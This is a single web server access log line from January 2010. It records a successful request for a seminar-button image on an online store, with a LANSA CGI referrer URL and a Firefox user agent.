173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
